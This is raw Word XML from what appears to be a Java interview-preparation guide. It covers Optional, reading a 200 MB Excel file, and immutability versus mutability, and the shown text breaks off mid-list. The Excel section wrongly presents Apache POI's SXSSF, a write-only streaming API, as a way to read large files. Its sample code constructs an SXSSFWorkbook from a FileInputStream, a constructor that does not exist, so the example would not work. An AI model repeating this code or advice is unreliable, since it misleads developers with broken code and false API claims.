          <w:ilvl w:val="0"/>
          <w:numId w:val="49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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30866089" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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ptional&lt;String&gt; optionalName = Optional.ofNullable("John");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E323074" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D687B">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ptionalName.ifPresent(name -&gt; System.out.println(name)); // John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56798CF5" w14:textId="77777777" w:rsidR="00210D70" w:rsidRPr="00CE4B95" w:rsidRDefault="00210D70" w:rsidP="006D68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se interfaces help facilitate the functional programming paradigm introduced in Java 8, enabling you to write cleaner, more expressive, and reusable code with lambdas and streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E5E7FA" w14:textId="66822E10"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BDA086E">
          <v:rect id="_x0000_i1224" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A9C18" w14:textId="043D8181" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="009A3EA0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc196307559"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>If I have a 200 MB excel file so can java read that file</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="5A81D9ED" w14:textId="74A5F0F9" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">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 Java can read a 200 MB Excel file, but how efficiently it can do so depends on the approach used and the libraries employed. Large files, such as a 200 MB Excel file, may need to be handled carefully to avoid excessive memory usage or performance bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429237BB"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 are a few things to consider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E70EA94" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333"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Libraries for Reading Excel Files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE43450"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 provides several libraries for reading Excel files. Some popular ones include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B7C756" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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pache POI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A672C1F" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49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pache POI is a widely used library for reading and writing Excel files in Java. It can handle both .xls (HSSF) and .xlsx (XSSF) file formats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73148118" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49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pache POI's XSSF (for .xlsx files) and HSSF (for .xls files) are typically used to read Excel files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A95BC5" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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pache POI Streaming API (SXSSF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20327DB1" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49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you're dealing with very large files (like a 200 MB Excel file), consider using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SXSSF</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Streaming Usermodel API) from Apache POI. SXSSF is designed for writing large Excel files, but it also helps to read large files efficiently by processing them in a streaming fashion, minimizing memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0CC325" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49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XSSF writes data to disk and keeps a small in-memory buffer for the current sheet, which can be helpful when reading large Excel files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A74619" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49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penCSV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C38F6E3" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="49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reading CSV data in a memory-efficient way, OpenCSV is a good option, though it only works with CSV files. If your Excel file can be saved as CSV, this could be a good choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40643915" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333"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siderations for Reading Large Excel Files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEEB391" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636BB2D1" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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ading large files directly into memory can consume a lot of resources, leading to OutOfMemoryError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B7E068" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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XSSF</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for writing large files) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Streaming API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for reading) are more memory-efficient because they process the file in chunks rather than loading it entirely into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A28BF82" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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reaming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3847D43D" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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 streaming approaches, such as the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache POI Streaming API</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which reads and processes the file in chunks, reducing the memory footprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A60539" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ocessing in Chunks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A23261D" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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stead of processing the entire file at once, read and process it row-by-row or in small batches. This helps keep memory usage low.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5179E82C" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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For example, reading rows from the Excel file as streams and performing necessary operations incrementally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCCBE52" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ultithreading</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE1D90" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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you're reading very large files and need to perform intensive processing, consider using multithreading to break the task into smaller chunks (e.g., by sheets or rows).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B10BFB" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333"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using Apache POI's Streaming API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2580E4"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s a simple example of how you might use Apache POI to read a large .xlsx Excel file with minimal memory usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCE631A"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org.apache.poi.xssf.streaming.SXSSFWorkbook;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BC9FBC"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org.apache.poi.ss.usermodel.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A48A71F" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2040101A"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io.FileInputStream;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B685FE"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io.IOException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793F453A" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B4FA7C0"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ReadLargeExcelFile {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E336F6"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throws IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC03669"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leInputStream fis = new FileInputStream("large_file.xlsx");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F43915"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ry (SXSSFWorkbook wb = new SXSSFWorkbook(fis)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483E9380"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heet sheet = wb.getSheetAt(0); // Read the first sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD6A2C"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ECED733"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or (Row row : sheet) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7022A8B9"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or (Cell cell : row) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAFC24E"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witch (cell.getCellType()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE2956"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ase STRING:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0344C3F4"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cell.getStringCellValue() + "\t");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001E16ED"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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6226D1"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ase NUMERIC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5977EA8C"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cell.getNumericCellValue() + "\t");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686DE981"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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA3E23D"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ase BOOLEAN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392B18F9"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cell.getBooleanCellValue() + "\t");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4569E7FE"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break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF5C575"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efault:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A4C63D"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Unknown\t");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7955D67E"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D1292C9"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C962253"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AFCD5B"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165D1A2"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A2808D1"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CE73960"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D911706" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333"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 of Techniques for Efficient File Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422D4AD3" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Apache POI SXSSF for Large Files</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This approach allows you to handle large files with minimal memory usage by streaming the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C4E0D" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ad Files Row-by-Row</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Avoid loading the entire file into memory. Process the file in chunks (one row at a time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6B3AEA" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ptimize Memory Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Make sure you're not holding large objects in memory for longer than necessary, and be mindful of large intermediate objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BFF5F5" w14:textId="77777777" w:rsidR="00E64333" w:rsidRPr="00CE4B95" w:rsidRDefault="00E64333"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conclusion, Java can read a 200 MB Excel file, but efficient memory management and choosing the right approach (such as using streaming or chunk-based processing) will ensure the task is done efficiently without running into performance or memory issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66783814" w14:textId="354A870E" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A37CF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54FE680">
          <v:rect id="_x0000_i1225" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="069648EA" w14:textId="3DC4B4A3" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EE1B87" w:rsidP="00A37CF1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc196307560"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is immutability and mutability in java</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="2691FA90" w14:textId="66CE4875" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00EE12AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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mmutability and Mutability in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494633A3"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Immutability</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mutability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are concepts that refer to whether or not an object's state can be changed after it is created. These concepts are crucial for understanding how Java objects behave with respect to their state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2537DF70" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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Immutability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B83A2C0"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n </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immutable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> object is one whose state (data) cannot be changed once it is created. In other words, an immutable object is a read-only object, and all its fields are final. After the object is constructed, you cannot modify any of its fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3407A280" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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Characteristics of Immutable Objects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F1E0FE" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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elds are final</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once assigned, they cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1151379C" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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setters or mutators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The object does not provide methods to modify its internal state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CF0C26" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ep copies</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the object contains fields that are mutable (like arrays or collections), a deep copy of those fields is made during construction or when they are accessed, to prevent external changes to the state of the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6911FBA6" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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 safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Immutable objects are inherently thread-safe because their state cannot change once they are created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EFF43B" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E"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y Use Immutable Objects?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D796EFA" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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y are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Because their state cannot be changed, they can be safely shared between multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A323E4" w14:textId="77777777" w:rsidR="00AA798E" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA798E" w:rsidP="00A37CF1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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y are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
